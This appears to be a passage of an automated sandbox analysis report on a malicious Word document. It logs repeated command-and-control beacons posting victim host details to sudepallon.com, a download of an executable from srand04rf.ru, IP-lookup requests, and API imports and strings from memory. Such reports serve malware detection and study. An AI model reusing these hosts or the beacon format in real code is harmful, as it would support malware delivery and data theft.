Source: global traffic	HTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 112Cache-Control: no-cacheData Raw: 47 55 49 44 3d 37 34 36 39 35 35 36 38 36 30 38 30 32 38 32 33 34 30 34 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 33 39 30 31 32 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=7469556860802823404&BUILD=0707_wvcr&INFO=390120 @ user-PC\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.1(x64)
Source: global traffic	HTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 112Cache-Control: no-cacheData Raw: 47 55 49 44 3d 37 34 36 39 35 35 36 38 36 30 38 30 32 38 32 33 34 30 34 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 33 39 30 31 32 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=7469556860802823404&BUILD=0707_wvcr&INFO=390120 @ user-PC\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.1(x64)
Source: global traffic	HTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 112Cache-Control: no-cacheData Raw: 47 55 49 44 3d 37 34 36 39 35 35 36 38 36 30 38 30 32 38 32 33 34 30 34 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 33 39 30 31 32 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=7469556860802823404&BUILD=0707_wvcr&INFO=390120 @ user-PC\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.1(x64)
Source: global traffic	HTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 112Cache-Control: no-cacheData Raw: 47 55 49 44 3d 37 34 36 39 35 35 36 38 36 30 38 30 32 38 32 33 34 30 34 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 33 39 30 31 32 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=7469556860802823404&BUILD=0707_wvcr&INFO=390120 @ user-PC\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.1(x64)
Source: global traffic	HTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 112Cache-Control: no-cacheData Raw: 47 55 49 44 3d 37 34 36 39 35 35 36 38 36 30 38 30 32 38 32 33 34 30 34 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 33 39 30 31 32 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=7469556860802823404&BUILD=0707_wvcr&INFO=390120 @ user-PC\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.1(x64)
Source: global traffic	HTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 112Cache-Control: no-cacheData Raw: 47 55 49 44 3d 37 34 36 39 35 35 36 38 36 30 38 30 32 38 32 33 34 30 34 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 33 39 30 31 32 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=7469556860802823404&BUILD=0707_wvcr&INFO=390120 @ user-PC\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.1(x64)
Source: global traffic	HTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 112Cache-Control: no-cacheData Raw: 47 55 49 44 3d 37 34 36 39 35 35 36 38 36 30 38 30 32 38 32 33 34 30 34 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 33 39 30 31 32 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=7469556860802823404&BUILD=0707_wvcr&INFO=390120 @ user-PC\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.1(x64)
Source: global traffic	HTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 112Cache-Control: no-cacheData Raw: 47 55 49 44 3d 37 34 36 39 35 35 36 38 36 30 38 30 32 38 32 33 34 30 34 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 33 39 30 31 32 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=7469556860802823404&BUILD=0707_wvcr&INFO=390120 @ user-PC\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.1(x64)
Source: global traffic	HTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 112Cache-Control: no-cacheData Raw: 47 55 49 44 3d 37 34 36 39 35 35 36 38 36 30 38 30 32 38 32 33 34 30 34 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 33 39 30 31 32 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=7469556860802823404&BUILD=0707_wvcr&INFO=390120 @ user-PC\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.1(x64)
Source: global traffic	HTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 112Cache-Control: no-cacheData Raw: 47 55 49 44 3d 37 34 36 39 35 35 36 38 36 30 38 30 32 38 32 33 34 30 34 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 33 39 30 31 32 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=7469556860802823404&BUILD=0707_wvcr&INFO=390120 @ user-PC\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.1(x64)
Source: global traffic	HTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 112Cache-Control: no-cacheData Raw: 47 55 49 44 3d 37 34 36 39 35 35 36 38 36 30 38 30 32 38 32 33 34 30 34 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 33 39 30 31 32 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=7469556860802823404&BUILD=0707_wvcr&INFO=390120 @ user-PC\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.1(x64)
Source: global traffic	HTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 112Cache-Control: no-cacheData Raw: 47 55 49 44 3d 37 34 36 39 35 35 36 38 36 30 38 30 32 38 32 33 34 30 34 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 33 39 30 31 32 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=7469556860802823404&BUILD=0707_wvcr&INFO=390120 @ user-PC\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.1(x64)
Source: global traffic	HTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 112Cache-Control: no-cacheData Raw: 47 55 49 44 3d 37 34 36 39 35 35 36 38 36 30 38 30 32 38 32 33 34 30 34 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 33 39 30 31 32 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=7469556860802823404&BUILD=0707_wvcr&INFO=390120 @ user-PC\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.1(x64)
Source: global traffic	HTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 112Cache-Control: no-cacheData Raw: 47 55 49 44 3d 37 34 36 39 35 35 36 38 36 30 38 30 32 38 32 33 34 30 34 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 33 39 30 31 32 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=7469556860802823404&BUILD=0707_wvcr&INFO=390120 @ user-PC\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.1(x64)
Source: global traffic	HTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 112Cache-Control: no-cacheData Raw: 47 55 49 44 3d 37 34 36 39 35 35 36 38 36 30 38 30 32 38 32 33 34 30 34 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 33 39 30 31 32 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=7469556860802823404&BUILD=0707_wvcr&INFO=390120 @ user-PC\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.1(x64)
Source: global traffic	HTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 112Cache-Control: no-cacheData Raw: 47 55 49 44 3d 37 34 36 39 35 35 36 38 36 30 38 30 32 38 32 33 34 30 34 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 33 39 30 31 32 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=7469556860802823404&BUILD=0707_wvcr&INFO=390120 @ user-PC\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.1(x64)
Source: global traffic	HTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 112Cache-Control: no-cacheData Raw: 47 55 49 44 3d 37 34 36 39 35 35 36 38 36 30 38 30 32 38 32 33 34 30 34 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 33 39 30 31 32 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=7469556860802823404&BUILD=0707_wvcr&INFO=390120 @ user-PC\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.1(x64)
Source: global traffic	HTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 112Cache-Control: no-cacheData Raw: 47 55 49 44 3d 37 34 36 39 35 35 36 38 36 30 38 30 32 38 32 33 34 30 34 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 33 39 30 31 32 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=7469556860802823404&BUILD=0707_wvcr&INFO=390120 @ user-PC\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.1(x64)
Source: global traffic	HTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 112Cache-Control: no-cacheData Raw: 47 55 49 44 3d 37 34 36 39 35 35 36 38 36 30 38 30 32 38 32 33 34 30 34 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 33 39 30 31 32 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=7469556860802823404&BUILD=0707_wvcr&INFO=390120 @ user-PC\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.1(x64)
Source: global traffic	HTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 112Cache-Control: no-cacheData Raw: 47 55 49 44 3d 37 34 36 39 35 35 36 38 36 30 38 30 32 38 32 33 34 30 34 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 33 39 30 31 32 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=7469556860802823404&BUILD=0707_wvcr&INFO=390120 @ user-PC\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.1(x64)
Source: global traffic	HTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 112Cache-Control: no-cacheData Raw: 47 55 49 44 3d 37 34 36 39 35 35 36 38 36 30 38 30 32 38 32 33 34 30 34 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 33 39 30 31 32 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=7469556860802823404&BUILD=0707_wvcr&INFO=390120 @ user-PC\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.1(x64)
Source: global traffic	HTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 112Cache-Control: no-cacheData Raw: 47 55 49 44 3d 37 34 36 39 35 35 36 38 36 30 38 30 32 38 32 33 34 30 34 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 33 39 30 31 32 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=7469556860802823404&BUILD=0707_wvcr&INFO=390120 @ user-PC\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.1(x64)
Source: global traffic	HTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 112Cache-Control: no-cacheData Raw: 47 55 49 44 3d 37 34 36 39 35 35 36 38 36 30 38 30 32 38 32 33 34 30 34 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 33 39 30 31 32 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=7469556860802823404&BUILD=0707_wvcr&INFO=390120 @ user-PC\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.1(x64)
Source: global traffic	HTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 112Cache-Control: no-cacheData Raw: 47 55 49 44 3d 37 34 36 39 35 35 36 38 36 30 38 30 32 38 32 33 34 30 34 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 33 39 30 31 32 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=7469556860802823404&BUILD=0707_wvcr&INFO=390120 @ user-PC\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.1(x64)
Source: global traffic	HTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 112Cache-Control: no-cacheData Raw: 47 55 49 44 3d 37 34 36 39 35 35 36 38 36 30 38 30 32 38 32 33 34 30 34 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 33 39 30 31 32 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=7469556860802823404&BUILD=0707_wvcr&INFO=390120 @ user-PC\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.1(x64)
Source: global traffic	HTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 112Cache-Control: no-cacheData Raw: 47 55 49 44 3d 37 34 36 39 35 35 36 38 36 30 38 30 32 38 32 33 34 30 34 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 33 39 30 31 32 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=7469556860802823404&BUILD=0707_wvcr&INFO=390120 @ user-PC\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.1(x64)
Source: global traffic	HTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 112Cache-Control: no-cacheData Raw: 47 55 49 44 3d 37 34 36 39 35 35 36 38 36 30 38 30 32 38 32 33 34 30 34 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 33 39 30 31 32 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=7469556860802823404&BUILD=0707_wvcr&INFO=390120 @ user-PC\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.1(x64)
Source: global traffic	HTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 112Cache-Control: no-cacheData Raw: 47 55 49 44 3d 37 34 36 39 35 35 36 38 36 30 38 30 32 38 32 33 34 30 34 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 33 39 30 31 32 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=7469556860802823404&BUILD=0707_wvcr&INFO=390120 @ user-PC\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.1(x64)
Source: global traffic	HTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 112Cache-Control: no-cacheData Raw: 47 55 49 44 3d 37 34 36 39 35 35 36 38 36 30 38 30 32 38 32 33 34 30 34 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 33 39 30 31 32 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=7469556860802823404&BUILD=0707_wvcr&INFO=390120 @ user-PC\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.1(x64)

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 3_2_021128D0 lstrlenA,lstrlenA,InternetCrackUrlA,InternetConnectA,HttpOpenRequestA,InternetCloseHandle,InternetQueryOptionA,InternetSetOptionA,HttpSendRequestA,HttpQueryInfoA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,

3_2_021128D0

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{8AE9CCB3-349E-46EF-BF24-C3A751787722}.tmp

Jump to behavior

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Accept: /User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: api.ipify.orgCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /7hfjsdfjks.exe HTTP/1.1Accept: /User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: srand04rf.ruCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Accept: /User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: api.ipify.orgCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /?format=xml HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: api.ipify.orgConnection: Keep-Alive

Source: svchost.exe, 00000005.00000002.2168632180.000000000066D000.00000004.00000020.sdmp	String found in binary or memory: /moc.nideknil.wwwwww.linkedin.com equals www.linkedin.com (Linkedin)
Source: rundll32.exe, 00000002.00000002.2345751253.0000000001D40000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.2345952313.0000000001D30000.00000002.00000001.sdmp	String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
Source: svchost.exe, 00000005.00000002.2168632180.000000000066D000.00000004.00000020.sdmp	String found in binary or memory: www.linkedin.com equals www.linkedin.com (Linkedin)

Source: unknown

